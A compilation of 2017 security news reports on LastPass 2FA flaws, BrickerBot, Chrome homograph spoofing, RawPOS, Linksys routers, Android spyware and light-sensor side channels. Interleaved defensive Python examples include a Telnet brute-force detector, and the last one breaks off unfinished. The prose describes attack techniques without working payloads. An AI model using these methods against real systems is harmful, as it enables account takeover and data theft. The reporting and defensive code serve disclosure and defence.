While determining the URL of the QR code was not difficult, a hacker needed to be authenticated for the attack to work. However, exploiting a cross-site request forgery (CSRF) vulnerability could address this problem. Getting a logged-in user to click on a specially crafted link that exploits a CSRF flaw could have allowed an attacker to obtain the QR code image.

According to Vigo, an attacker could have also leveraged cross-site scripting (XSS) vulnerabilities on popular websites to avoid having the victim visit his malicious site, which would be more likely to raise suspicion.

The researcher also found a simple way to disable 2FA using a CSRF vulnerability. As with all CSRF attacks, the hacker needed to get the victim to visit a malicious website.

LastPass was informed about these vulnerabilities on February 7 and immediately started working on patches. The company addressed the CSRF flaws, added a security mechanism for checking the origin of a QR code request, and eliminated the use of password hashes for the secret seed.
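The design point above, a 2FA seed that is a function of the password, is easiest to see in code. The following is an added example, not LastPass’ code: it implements standard HOTP/TOTP (RFC 4226/6238) and contrasts a seed derived from the password with an independent random seed. The key-derivation function, its parameters and the user names are assumptions made for the illustration, not LastPass’ actual scheme.

```python
"""Why a TOTP seed must be independent of the password (added example)."""
import hashlib
import hmac
import os
import struct


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, then dynamic truncation."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with the counter set to the current 30-second time step."""
    return hotp(secret, at_time // step, digits)


def seed_from_password(username: str, password: str) -> bytes:
    """Models the flawed design: the seed is a deterministic function of the password,
    so anyone holding the password can recompute it. The KDF and its parameters are
    assumptions for this example, not the scheme LastPass actually used."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), username.encode(), 5000, 20)


def enroll(username: str, password: str, derive_from_password: bool) -> bytes:
    """Return the seed the server stores and shows to the user (e.g. inside a QR code)."""
    if derive_from_password:
        return seed_from_password(username, password)
    # Fixed design: a fresh random seed that has no relation to the password.
    return os.urandom(20)


def password_alone_suffices(real_seed: bytes, username: str, password: str, at_time: int) -> bool:
    """Given only the password, does recomputing the seed yield the live code?
    True means the second factor adds nothing over the first."""
    recomputed = seed_from_password(username, password)
    return totp(recomputed, at_time) == totp(real_seed, at_time)


if __name__ == "__main__":
    now = 1_500_000_000          # fixed timestamp so the run is reproducible
    user, pw = "alice", "correct horse battery"   # constructed sample credentials
    weak = enroll(user, pw, derive_from_password=True)
    strong = enroll(user, pw, derive_from_password=False)
    print("password-derived seed, code reproducible from password:", password_alone_suffices(weak, user, pw, now))
    print("random seed, code reproducible from password:", password_alone_suffices(strong, user, pw, now))
```

The random seed must be stored server-side alongside the account and shown to the user exactly once at enrollment; that is what makes it a second factor, and it is the reason the QR-code request must also be protected against cross-origin fetches.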

In a blog post published on Thursday, LastPass informed users that they don’t need to take any action as all the fixes have been done on the server side. The company also pointed out that exploiting the flaws required a combination of factors that made attacks more difficult.

“To exploit this issue an attacker would have needed to take several steps to bypass Google Authenticator,” LastPass said. “First, the attacker would have had to lure a user to a nefarious website. Second, the user would have to be logged in to LastPass at the time of visiting the malicious site.”

Vigo’s disclosure comes shortly after Google Project Zero researcher Tavis Ormandy reported finding several vulnerabilities in the LastPass browser extensions.


ICS-CERT Warns of BrickerBot's IoT Device Damaging Capabilities

21.4.2017 securityweek BotNet

The Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has issued an alert on BrickerBot, a piece of malware designed to permanently disable Internet of Things (IoT) devices.

Discovered earlier this month, the malware is capable of what Radware researchers call Permanent Denial-of-Service (PDoS). Two versions of the malware were observed to date, both featuring the same capabilities: they can damage the compromised devices’ firmware and disable basic functions.

Citing the Radware report, ICS-CERT warns that one version of BrickerBot is targeting devices running BusyBox that have an exposed Telnet command window, and which also have SSH exposed through an older version of Dropbear SSH server. Identified as Ubiquiti network devices, most of these run outdated firmware, while some are access points or bridges with beam directivity.

The second malware variant is targeting Linux-based devices both with and without BusyBox, but which expose a Telnet service secured with default or hard-coded passwords. This variant also uses TOR exit nodes to hide the source of the attack, ICS-CERT’s alert also points out.

While BrickerBot.1 was active for only about a week, between March 20 and March 25, BrickerBot.2 continues to operate. What is not known for the time being, however, is what type of devices are used to launch these attacks, or how many of them there are.

In a new announcement, Radware reveals that the IP camera they tested the discovered malware on stopped working completely, and that a factory reset didn’t restore functionality. The security firm also notes that users might not even be aware of the malware attack, and could simply believe they bought faulty hardware.

ICS-CERT says it is working on identifying vendors of affected devices and on collecting detailed mitigation information. Until that happens, however, users can take some steps to protect their devices, such as changing the default credentials, disabling Telnet access to the device, and setting intrusion protection systems to block Telnet default credentials or reset Telnet connections.

These steps should keep devices protected from other threats as well, including Mirai, the distributed denial of service botnet that has been wreaking havoc among insecure IoT devices for more than half a year.

Users can also use network behavioral analysis to detect anomalies in traffic, along with automatic signature generation for protection. Ubiquiti Networks device owners are also advised to update to the latest firmware. Using strong passwords and disabling or renaming default system accounts should also help improve protection.
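The advice above (block Telnet default-credential attempts, reset Telnet connections, rename default accounts) implies a detection that a defender can run over device logs. The following is an added example and not part of the ICS-CERT alert or Radware’s research: the log format, host names, IP addresses and the default-account list are all constructed for the illustration, so adapt the regular expression to whatever your devices actually emit.

```python
"""Flag Telnet credential guessing and default-account logins in device logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in a made-up syslog-like format (not a real device's format).
SAMPLE_LOG = """\
2017-04-20T10:00:01Z cam01 telnetd: login user=root from=203.0.113.5 result=FAIL
2017-04-20T10:00:02Z cam01 telnetd: login user=admin from=203.0.113.5 result=FAIL
2017-04-20T10:00:03Z cam01 telnetd: login user=root from=203.0.113.5 result=FAIL
2017-04-20T10:00:04Z cam01 telnetd: login user=root from=203.0.113.5 result=OK
2017-04-20T10:05:00Z cam01 telnetd: login user=operator from=198.51.100.7 result=OK
2017-04-20T11:00:00Z cam01 telnetd: login user=admin from=192.0.2.9 result=FAIL
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) telnetd: login user=(?P<user>\S+) "
    r"from=(?P<src>\S+) result=(?P<result>OK|FAIL)$"
)

# Placeholder list of account names that ship enabled on many embedded devices;
# any successful Telnet login with one of these is worth a review.
DEFAULT_ACCOUNTS = {"root", "admin"}


def parse_log(text: str) -> list:
    """Parse matching lines into dicts; lines in other formats are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(d)
    return events


def detect(events: list, max_failures: int = 3, window: timedelta = timedelta(seconds=60)) -> list:
    """Return alerts as (kind, source_ip, detail) tuples, in log order.

    - telnet-bruteforce: max_failures or more failed logins from one source inside window
    - success-after-failures: a successful login from a source with recent failures
    - default-account-login: a successful login using a default account name
    """
    alerts = []
    failures = defaultdict(list)          # source ip -> timestamps of recent failures
    for e in events:
        src = e["src"]
        if e["result"] == "FAIL":
            failures[src].append(e["ts"])
            failures[src] = [t for t in failures[src] if e["ts"] - t <= window]
            if len(failures[src]) >= max_failures:
                alerts.append(("telnet-bruteforce", src, f"{len(failures[src])} failures within {window.seconds}s"))
        else:
            if failures[src]:
                alerts.append(("success-after-failures", src, f"user={e['user']}"))
            if e["user"] in DEFAULT_ACCOUNTS:
                alerts.append(("default-account-login", src, f"user={e['user']}"))
    return alerts


def sources_to_block(alerts: list) -> list:
    """Sources that produced a brute-force alert, for feeding a block or reset rule."""
    return sorted({src for kind, src, _ in alerts if kind == "telnet-bruteforce"})


if __name__ == "__main__":
    found = detect(parse_log(SAMPLE_LOG))
    for kind, src, detail in found:
        print(f"{kind:24} {src:15} {detail}")
    print("block:", sources_to_block(found))
```

The success-after-failures rule is the one that matters most for a device that is about to be bricked: a login that follows a burst of guesses from the same source is the moment at which a session reset or block still helps.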

“ICS-CERT strongly encourages asset owners not to assume that their control systems are deployed securely or that they are not operating with an Internet accessible configuration. Instead, asset owners should thoroughly audit their networks for Internet facing devices, weak authentication methods, and component vulnerabilities. Control systems often have Internet accessible devices installed without the owner’s knowledge, putting those systems at increased risk of attack,” ICS-CERT’s alert reads.

The fact that new malware targeting IoT devices can permanently disable them shouldn’t come as a surprise, Bill Diotte, CEO, Mocana Corporation, told SecurityWeek in an emailed statement.

“IoT designers and manufacturers must start presuming that their devices will be subject to attack the minute they are connected to the Internet. The industry needs to make security as high a priority as performance and free overnight shipping,” Diotte said.


Chrome Addresses Threat of Unicode Domain Spoofing

21.4.2017 securityweek Phishing
Chrome 58 Resolves Unicode Domain Spoofing

Google on Wednesday released Chrome 58 to the stable channel for Windows, Mac and Linux to address 29 vulnerabilities, including an issue that rendered users vulnerable to Unicode domain phishing.

Demonstrated by web developer Xudong Zheng, the bug resides in the use of Unicode characters in Internet hostnames through Punycode. By using characters that may look the same but are represented differently in Punycode, malicious actors can spoof legitimate websites and use them in phishing attacks.

The issue was also demonstrated by Avanan researchers in December 2016, when they stumbled upon live phishing attacks targeting Office 365 business email users. Using Unicode characters, attackers could create a site looking like http://www.pаypal.com/, but which actually resolved to http://www.xn--pypal-4ve.com/, thus bypassing Office 365’s anti-phishing defenses, the researchers explained.
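The pаypal.com / xn--pypal-4ve.com pair above can be checked mechanically: decode the Punycode label back to Unicode and look at which scripts its letters come from. The following is an added example, not Chrome’s or Avanan’s code; Python’s built-in idna codec does the Punycode conversion, and the look-alike table is a small constructed subset, not a complete confusables list (Chrome’s real policy is more elaborate and is not reproduced here). It goes slightly beyond the page’s mixed-script case by also flagging labels written entirely in look-alike letters.

```python
"""Flag IDN homograph candidates in hostnames (added example, not Chrome's logic)."""
import unicodedata

# Constructed subset of Cyrillic letters that render like Latin ones; illustrative only.
CONFUSABLE_TO_LATIN = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i",
}


def decode_hostname(host: str) -> str:
    """Convert an ASCII (xn--) hostname to its Unicode form; Unicode input is returned as is."""
    if host.isascii():
        return host.encode("ascii").decode("idna")
    return host


def encode_hostname(host: str) -> str:
    """Convert a Unicode hostname to the ASCII/Punycode form the resolver actually sees."""
    return host.encode("idna").decode("ascii")


def script_of(ch: str) -> str:
    """First word of the Unicode character name, e.g. LATIN, CYRILLIC, GREEK."""
    name = unicodedata.name(ch, "")
    return name.split(" ", 1)[0] if name else "UNKNOWN"


def label_scripts(label: str) -> set:
    return {script_of(c) for c in label if c.isalpha()}


def check_hostname(host: str) -> dict:
    """Return the decoded host, a Latin 'skeleton' for comparison against known brands,
    and a list of (label, reason) findings for labels that deserve a warning."""
    unicode_host = decode_hostname(host)
    findings = []
    for label in unicode_host.split("."):
        scripts = label_scripts(label)
        letters = [c for c in label if c.isalpha()]
        if len(scripts) > 1:
            # Latin and Cyrillic letters in one label, as in p<Cyrillic a>ypal.
            findings.append((label, "mixed-script"))
        elif scripts and scripts != {"LATIN"} and all(c in CONFUSABLE_TO_LATIN for c in letters):
            # Single non-Latin script where every letter has a Latin look-alike.
            findings.append((label, "whole-script-confusable"))
    skeleton = "".join(CONFUSABLE_TO_LATIN.get(c, c) for c in unicode_host)
    return {"unicode": unicode_host, "skeleton": skeleton,
            "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    for h in ("www.paypal.com", "www.xn--pypal-4ve.com"):
        r = check_hostname(h)
        print(h, "->", r["unicode"], "| skeleton:", r["skeleton"], "| findings:", r["findings"])
```

The skeleton is what you compare against an allow-list of your own brand names: a hostname whose skeleton equals a known brand but whose encoded form differs from the brand’s real domain is the homograph case this article describes.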

Chrome 58 addresses the bug, which Google refers to as a URL spoofing in Omnibox (CVE-2017-5060). Assigned only a Medium severity rating, the vulnerability earned Xudong Zheng a $2000 bounty.

Two other Medium risk URL spoofing in Omnibox flaws were addressed as well: CVE-2017-5061, discovered by Haosheng Wang (awarded $2000), and CVE-2017-5067, credited to Khalil Zhani (awarded $500).

Only 12 of the 29 security fixes in Chrome 58 were for flaws discovered by external researchers: three rated High severity, eight Medium risk, and one Low severity.

The High risk flaws include a Type confusion in PDFium (CVE-2017-5057), found by Guang Gong of Alpha Team, Qihoo 360 ($3000); a Heap use after free in Print Preview (CVE-2017-5058), discovered by Khalil Zhani ($2000); and a Type confusion in Blink (CVE-2017-5059), credited to SkyLined working with Trend Micro's Zero Day Initiative.

The Medium severity bugs also included a Use after free in Chrome Apps (CVE-2017-5062), a Heap overflow in Skia (CVE-2017-5063), a Use after free in Blink (CVE-2017-5064), Incorrect UI in Blink (CVE-2017-5065), and Incorrect signature handling in Networking (CVE-2017-5066).

The Low severity vulnerability was a Cross-origin bypass in Blink tracked as CVE-2017-5069 and was discovered by Michael Reizelman.


RawPOS Malware Steals Driver's License Information

21.4.2017 securityweek Virus
The RawPOS Point-of-Sale (PoS) RAM scraper malware was recently observed stealing driver’s license information from victims, Trend Micro has discovered.

RawPOS is one of the oldest PoS malware families out there, with patterns matching its activity dating as far back as 2008. Over time, the actors behind it have focused mainly on the hospitality industry, and have been using the same malware components and tools for lateral movement.

These actors have since started gathering additional information from the compromised systems, which put victims at greater risk of identity theft, researchers warn. The driver’s license information stolen by the malware can be used by cybercriminals in their malicious activities.

RawPOS, Trend Micro explains, attempts to gather both credit card mag stripe data and other types of valuable information in a single sweep, while modifying the regex string to capture the needed data. The malware scans processes to find “track data”-like strings in memory. It then dumps process memory for a file scraper to organize the data.

The threat used almost the same pattern matching for the first eight years, but changed it in 2016 to start looking for “drivers” and “license” strings, as well as for an “ANSI 636” string. This is a mandatory PDF417 bar code to aid in “identity and age verification, automation of administrative processing, and address verification,” as defined in the 2013 North American AAMVA DL/ID Card Design Standard.

Because the numbers “636” are the initial digits of the Issuer Identification Number (IIN) for most US states, the security researchers concluded that the actors were interested in driver’s license information within the US.

“The Information stored in each license varies per state, but the bar code mostly contains the same information present in each individual driver’s license or state ID – specifically: full name, date of birth, full address, gender, height, even hair and eye color,” Trend Micro says.

The use of this barcode isn’t unheard of, although it is less common than credit card swipes, the security researchers explain. The driver’s license barcode could get scanned in pharmacies, retail shops, bars, casinos and other establishments that require it.

The use of personal information next to the stolen credit card details provides threat actors with a more “authentic” identity, while also allowing them to complete a transaction even if they don’t have the physical card.

“Aside from this, the driver’s license bar code swipe of the victims can also be used for other kinds of misrepresentation, such as identity theft. In any case, stolen Personal Identity Information (PII) will always be a serious issue that can lead to dire consequences for its victims,” the security researchers explain.


Anatomy of Cybercriminal Communications: Why do crooks prefer Skype
21.4.2017 securityaffairs CyberCrime

Security firm Flashpoint published an interesting paper titled ‘Cybercrime Economy: An Analysis of Cybercriminal Communication Strategies’ about the communications of threat actors.
Recent research by the threat intelligence firm Flashpoint has uncovered how malicious threat actors communicate to share information among themselves.

The research has found that there is a growing economy around cybercriminal communications: more than simple information sharing, an ecosystem has formed in which failures, successes, and the planning and procedures for beating organizations’ countermeasures are shared, along with the planning of attacks.

The research points out that cybercriminal communications use a variety of software alongside access to communities on the deep and dark web. This is done to coordinate across domains when committing crimes such as phishing, credit card fraud, spam, and every sort of attack that passes through corporations’ filters and defenses.

Cybercriminal Communications

The reason for using this software to communicate is to make it difficult for law enforcement agencies to track activities in the community’s forums, and to give privacy to users, since most of these programs have cryptographic functions or protocols at their core. The software also allows a user to enter random, arbitrary or even fraudulent information about themselves, which makes detection even more difficult.

Another reason is the payment required to maintain a forum, which in many cases can be a difficulty for cybercriminals. The communication programs are free of charge and anyone can download them.

The study was carried out by monitoring underground communities where users often invited other members to discuss their plans outside the underground forum. Eighty instant messaging applications and protocols were analyzed, of which at least five were in widespread use.

These applications implement privacy features, such as PGP encryption. Secure communication between users makes it difficult for authorities to gain access to the content they share without knowing the encryption key that protected the session.

The programs most used by cybercriminals are ICQ, Skype, Jabber, Quiet Internet Pager, Pretty Good Privacy, Pidgin, PSI and AOL Instant Messenger (AIM).

The report shows that the use of cybercriminal communications differs among communities of different languages. Below are the reported “Language Group Specific Findings”; for Russian-speaking communities the situation is as follows:

1. Jabber (28.3%) 2. Skype (24.26%) 3. ICQ (18.74%) 4. Telegram (16.39%) 5. WhatsApp (3.93%) 6. PGP (3.79%) 7. Viber (3.01%) 8. Signal (1.58%)

while for Chinese-speaking communities the distribution in 2016 was: 1. QQ (63.33%) 2. WeChat (35.58%) 3. Skype (0.44%) 4. WhatsApp (0.22%) 5. Jabber (0.31%) 6. PGP (0.13%) 7. ICQ (0.1%) 8. AOL Instant Messenger (0.08%)

“Cybercriminals can choose from a wide variety of platforms to conduct their peer-to-peer (P2P) communications.” states the report. “This choice is typically influenced by a combination of factors, which can include:

Ease of use
Country and/or Language
Security and/or anonymity concerns
Sources:

http://www.securityweek.com/many-cybercriminals-prefer-skype-communications-study

http://www.ibtimes.co.uk/skype-whatsapp-how-cybercriminals-share-hacking-tips-tricks-online-1617822

http://www.itnews.com/article/3190830/security/report-cybercriminals-prefer-skype-jabber-and-icq.html

http://www.infoworld.com/article/3190563/encryption/cybercriminals-prefer-to-chat-over-skype.html

https://www.flashpoint-intel.com/blog/cybercrime/cybercriminal-communication-strategies/


Vulnerabilities in Linksys routers allow attackers to hijack dozens of models
21.4.2017 securityaffairs Vulnerebility

Cyber security experts disclosed the existence of 10 unpatched security flaws in dozens of Linksys routers widely used today.
The IOActive senior security consultant Tao Sauvage and the independent security researcher Antide Petit have reported more than a dozen of unpatched security vulnerabilities affecting 25 different Linksys Smart Wi-Fi Routers models.

The security duo published a blog post on Wednesday providing details of their discoveries. Attackers can exploit the security vulnerabilities to extract sensitive information from the devices, trigger DoS conditions, change settings, and completely take them over. The vulnerabilities affect dozens of Linksys models, including the EA3500 Linksys Smart Wi-Fi, WRT and Wireless-AC series.
Linksys routers flaws
Out of 10 security vulnerabilities, six issues can be exploited by remote unauthenticated attackers.

All these products are widely used by private users and by small businesses; for this reason, the impact of the discovery is huge. It has been estimated that over 7,000 routers that have their web-based administrative interfaces exposed to the Internet are exposed to attacks.

The experts determined that 11 percent of the 7,000 Linksys routers still used default credentials.

“We performed a mass-scan of the ~7,000 devices to identify the affected models. In addition, we tweaked our scan to find how many devices would be vulnerable to the OS command injection that requires the attacker to be authenticated. We leveraged a router API to determine if the router was using default credentials without having to actually authenticate.” reads the blog post published by the two experts.
“We found that 11% of the ~7000 exposed devices were using default credentials and therefore could be rooted by attackers.”

Most of the flawed Linksys routers (~69%) are located in the USA, followed by Canada (~10%), Hong Kong (~1.8%), Chile (~1.5%), and the Netherlands (~1.4%).

If we consider the possibility that a local attacker exploits the issues to target systems over a local area network, the number of devices at risk dramatically increases.

The experts avoided providing technical details about the flaws in the Linksys routers to avoid mass attacks against the vulnerable devices. The duo confirmed that two of the flaws could be exploited to trigger a denial-of-service condition on flawed routers, making them unusable or forcing a reboot, by sending specifically crafted requests to a specific API.

Other vulnerabilities affecting the web interfaces of the Linksys routers allow attackers to bypass authentication and access many CGI scripts that can reveal sensitive information about the flawed devices and their configurations. An attacker can exploit the issues to obtain the Wi-Fi Protected Setup (WPS) PIN and to access the wireless network for further lateral movement from within. An attacker can exploit the vulnerability to determine firmware and kernel versions of the vulnerable Linksys routers and obtain a list of running processes, information about computers connected to the routers, a list of USB devices and the configuration settings for the FTP and SMB file-sharing servers.

The most severe flaw discovered by the experts could be exploited by attackers to inject and execute shell commands with root privileges on the affected routers. The flaw could be exploited to set up a backdoor administrative account that wouldn’t be listed in the web interface.

“Finally, authenticated attackers can inject and execute commands on the operating system of the router with root privileges. One possible action for the attacker is to create backdoor accounts and gain persistent access to the router. Backdoor accounts would not be shown on the web admin interface and could not be removed using the Admin account.” states the post.

The flaw requires authentication to be exploited; this means the attackers need to have access to an existing account.

“It should be noted that we did not find a way to bypass the authentication protecting the vulnerable API; this authentication is different than the authentication protecting the CGI scripts.”

Linksys confirmed it is currently working on firmware updates to fix the vulnerabilities, meantime, as mitigation measures it suggests users disable the guest Wi-Fi network feature on their routers.

“Linksys was recently notified of some vulnerabilities in our Linksys Smart Wi-Fi series of routers. As we work towards publishing firmware updates, as a temporary fix, we recommend that customers using Guest Networks on any of the affected products below temporarily disable this feature to avoid any attempts at malicious activity,” states the advisory. “We will be releasing firmware updates for all affected devices.”

The complete list of vulnerable Linksys routers is reported in the security advisory issued by the company.


The RawPOS PoS Malware also scans for driver’s license data
21.4.2017 securityaffairs Virus

According to Trend Micro, the RawPOS PoS malware was recently used to steal driver’s license information from victims.
Security experts at Trend Micro have spotted a new variant of the RawPOS PoS malware stealing driver’s license information from victims.

The RawPOS PoS malware is an old threat that has been active since 2008. RawPOS is a memory scraper that has infected lodging merchants since 2008 by targeting the memory where payment information may be temporarily stored; the scraped data is staged on the network and later removed by a separate process.

RawPOS PoS Malware

The malicious code was mainly used against targets in the hospitality industry, and over time crooks have also used it to steal additional information from victims.

Back to the present, crooks steal driver’s license information for several fraudulent activities. According to Trend Micro, the version of the RawPOS PoS malware recently spotted attempts to gather both credit card mag stripe data and other valuable information in a single sweep.

“Traditionally, PoS threats look for credit card mag stripe data and use other components such as keyloggers and backdoors to get other valuable information. RawPOS attempts to gather both in one go, cleverly modifying the regex string to capture the needed data.” reads the analysis published by TrendMicro.

The RawPOS PoS malware uses regular expressions to scan processes for strings that look like data stored in the magnetic stripe in order to find “track data”-like strings in memory.

The analysis of the regular expressions used by the threat demonstrates that starting from 2016 the malware scans memory for “drivers” and “license” strings, as well as for an “ANSI 636” string (“636” are the initial digits of the Issuer Identification Number (IIN) for most US states).

Crooks behind the last variant of the PoS malware were interested in driver’s license information belonging to US citizens.

“The Information stored in each license varies per state, but the bar code mostly contains the same information present in each individual driver’s license or state ID – specifically: full name, date of birth, full address, gender, height, even hair and eye color,” continues Trend Micro.

Researchers explained that driver’s license barcode could get scanned in many commercial activities, including pharmacies, retail shops, bars, and casinos.

The availability of personal information along with credit card data provides threat actors with a more “authentic” identity.

“Combining personal information with credit card information gives threat actors a more ‘authentic’ identity, and also provides all the information necessary to complete a transaction despite the lack of a physical card,” concluded Trend Micro. “Aside from this, the driver’s license bar code swipe of the victims can also be used for other kinds of misrepresentation, such as identity theft.”


Beware! Dozens of Linksys Wi-Fi Router Models Vulnerable to Multiple Flaws
20.4.2017 thehackernews  Vulnerebility
Bad news for consumers with Linksys routers: Cybersecurity researchers have disclosed nearly a dozen unpatched security flaws in Linksys routers, affecting 25 different Linksys Smart Wi-Fi router models widely used today.
IOActive's senior security consultant Tao Sauvage and independent security researcher Antide Petit published a blog post on Wednesday, revealing that they discovered 10 bugs late last year in 25 different Linksys router models.
Out of 10 security issues (ranging from moderate to critical), six can be exploited remotely by unauthenticated attackers.
According to the researchers, when exploited, the flaws could allow an attacker to overload the router, force a reboot by creating DoS conditions, deny legitimate user access, leak sensitive data, change restricted settings and even plant backdoors.
Many of the active Linksys devices exposed on the internet and scanned via Shodan were using default credentials, making them susceptible to takeover.
Researchers found more than 7,000 devices impacted by the security flaws at the time of the scan, though this does not include routers protected by firewalls or other network protections.
"We performed a mass-scan of the ~7,000 devices to identify the affected models," IOActive says. "We found that 11% of the ~7000 exposed devices were using default credentials and therefore could be rooted by attackers."
IOActive made Linksys aware of the issues in January this year and has been working "closely and cooperatively" with the company ever since to validate and address the vulnerabilities.
Here's how critical these flaws are:
The researchers did not reveal more details about the vulnerabilities until the patch is made available to users, although they said two of the flaws could be used for denial-of-service attacks on routers, making them unresponsive or reboot by sending fraudulent requests to a specific API.
Other flaws could allow attackers to bypass CGI scripts to collect sensitive data such as firmware versions, Linux kernel versions, running processes, connected USB devices, Wi-Fi WPS pins, firewall configurations, FTP settings, and SMB server settings.
CGI, or Common Gateway Interface, is a standard protocol which tells the web server how to pass data to and from an application.
Researchers also warned that attackers who have managed to authenticate to the device can inject and execute malicious code on its operating system with root privileges.
With these capabilities in hand, attackers can create backdoor accounts for persistent access that are invisible in the router's Smart Wi-Fi management console, and therefore to legitimate administrators.
However, researchers did not find an authentication bypass that can allow an attacker to exploit this flaw.
List of Vulnerable Linksys Router Models:
Here's the list of Linksys router models affected by the flaws:
EA2700, EA2750, EA3500, EA4500v3, EA6100, EA6200, EA6300, EA6350v2, EA6350v3, EA6400, EA6500, EA6700, EA6900, EA7300, EA7400, EA7500, EA8300, EA8500, EA9200, EA9400, EA9500, WRT1200AC, WRT1900AC, WRT1900ACS, and WRT3200ACM.
The majority of the exposed devices (nearly 69%) are located in the United States, and others were spotted in countries including Canada (almost 10%), Hong Kong (nearly 1.8%), Chile (~1.5%), and the Netherlands (~1.4%).
A small percentage of vulnerable Linksys routers have also been spotted in Argentina, Russia, Sweden, Norway, China, India, UK, and Australia.
Here's how you can mitigate attacks originating from these flaws:
As a temporary mitigation, Linksys recommends that its customers disable the Guest Network feature on any of the affected products to avoid any attempts at malicious activity.
The company also advised customers to change the password of the default account in order to protect themselves until a new firmware update is made available to patch the problems.
Linksys is working to release patches for the reported vulnerabilities with the next firmware update for all affected devices. Users with Smart Wi-Fi devices should therefore turn on the automatic update feature to get the latest firmware as soon as the new versions arrive.


Millions Download "System Update" Android Spyware via Google Play

20.4.2017 securityweek Android
Millions of users looking to get Android software updates have been tricked into downloading spyware on their devices through the Google Play marketplace, Zscaler reveals.

Posing as a legitimate application called “System Update” and claiming to provide users with access to the latest Android software updates, the spyware made it to Google Play in 2014, and had registered between 1,000,000 and 5,000,000 downloads by the time Google was alerted and removed it from the store.

Instead of delivering on its promise, however, the malware spies on users’ exact geolocation, and can send it to the attacker in real time. It receives commands from its operator via SMS messages, the security researchers explain.

The application’s Google Play page should have been a warning to users that it wasn’t what it appeared to be, given that it displayed blank screenshots and users were complaining about its lack of functionality, yet many still downloaded and installed it. The page also stated that the “application updates and enables special location features.”

When the user attempts to run the installed app, however, an error message is displayed: “Unfortunately, Update Service has stopped.” In the background, the application sets up an Android service and broadcast receiver to fetch the last known location and scan for incoming SMS messages.

The spyware is looking for incoming messages that feature a specific syntax, Zscaler explains: “the message should be more than 23 characters and should contain ‘vova-’ in the SMS body. It also scans for a message containing ‘get faq’.”

The attacker can set a location alert when the device’s battery is running low, and can also set their own password for the spyware (the application comes with the default password “Vova”). After a phone number and password are set, the spyware starts a process to send the device’s location to the attacker.

“The SMS-based behavior and exception generation at the initial stage of startup can be the main reason why none of the antivirus engines on VirusTotal detected this app at the time of analysis,” Zscaler explains.

The application was last updated in December 2014 and managed to evade detection for a long time, but its functionality remained active. What’s more, the security researchers discovered the same code for stealing a victim’s location as the DroidJack Trojan that was discovered several years ago, and which was recently posing as fake Pokemon GO and Super Mario Run games for Android.

“There are many apps on the Google Play Store that act as a spyware; for example, those that spy on the SMS messages of one’s spouse or fetch the location of children for concerned parents. But those apps explicitly state their purpose, which is not the case with the app [in] this report. It portrayed itself as a system update, misleading users into thinking they were downloading an Android System Update,” Zscaler concludes.


Ambient Light Sensors Put Browser Data at Risk: Researchers

20.4.2017 securityweek Security
The ambient light sensors present in phones, tablets and laptops can be abused to obtain potentially sensitive information from a user’s web browser, researchers warned.

Ambient light sensors measure light intensity in the environment, which is useful for adjusting the brightness of the display and for proximity detection. The data collected by the sensor is fairly precise and the frequency of readings is relatively high.

Last year, researcher Lukasz Olejnik analyzed theoretical security and privacy implications of ambient light sensors. The expert recently teamed up with Artur Janc and they demonstrated how the W3C’s ambient light sensor API can be abused to steal data from web browsers.

Some members of the industry have proposed allowing websites to access the ambient light sensor and other sensors without requiring explicit permission from the user. Recent versions of Firefox and Chrome have already implemented the W3C API – it’s enabled by default in the former and can be manually activated in the latter.

Proof-of-concept (PoC) exploits created by the researchers show how an attacker can determine a user’s browsing history based on the color of links, and how they can steal cross-origin resources, such as images and frames.

In order to determine which websites have been visited by a user, Olejnik and Janc relied on the fact that a site can apply different styles to links that have been visited and ones that have not been accessed.

An attacker can create a webpage that sets link styles to white for visited links and black for not-visited links. The attacker’s page then starts displaying a list of popular domain names one by one. If a link has been visited, the screen turns white; if it hasn’t been accessed, it turns black. The ambient sensor can log the light level when each link is displayed, and determine if that website had been accessed by the user.

Researchers also demonstrated how an attacker can steal cross-origin resources, such as account recovery QR codes. In this case, the hacker’s website embeds an image of the QR code from the targeted domain into their own site. The image is converted to monochrome using SVG filters, and it’s scaled so that each pixel is expanded one by one to fill up the screen. The exploit goes through each pixel, and the ambient sensor logs a white or black pixel depending on what is on the screen.

In their experiments, researchers determined that this technique can be used for a fully reliable exploit at a rate of one bit per 500 ms. At this rate, an attacker can exfiltrate an 8-character password in 24 seconds, a 20x20 QR code in 3 minutes and 20 seconds, and a 64x64 pixel image in just over half an hour. As for stealing a user’s browsing history, it takes 8 minutes and 20 seconds to go through 1,000 popular URLs and determine if they have been visited.

While it’s unlikely that such an obvious attack can be carried out while the phone is used, Olejnik and Janc pointed out that an attack can be conducted at night via a site that uses the screen.keepAwake API to keep the display on while the exploit is running.

Researchers believe these types of attacks could be prevented by limiting the frequency of sensor readings. An even more effective mitigation involves limiting the precision of sensor output (i.e. making it difficult for the color of the screen to influence the sensor reading).

Attacks can also be prevented if browser vendors require users to grant permission before giving websites access to the sensor. Both Google and Mozilla have been notified of the potential risks.
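To make the two mitigations concrete, the simulation below models a sensor wrapper that rate-limits and rounds readings, and checks whether a white and a black screen still produce different values. It is an added example, not the researchers' PoC or any browser's implementation; `SensorPolicy`, its parameters and the 6-bits-per-character accounting behind the article's 24-second figure are assumptions. It also shows the caveat a practitioner should know: rounding alone does not close the channel, it only shrinks the fraction of ambient levels at which the screen's contribution crosses a rounding boundary, so a longer reading interval (or a permission prompt) is still needed.

```python
import math
from dataclasses import dataclass, field
from typing import Optional

# Article figures: the PoC moves one bit per 500 ms. A password character is
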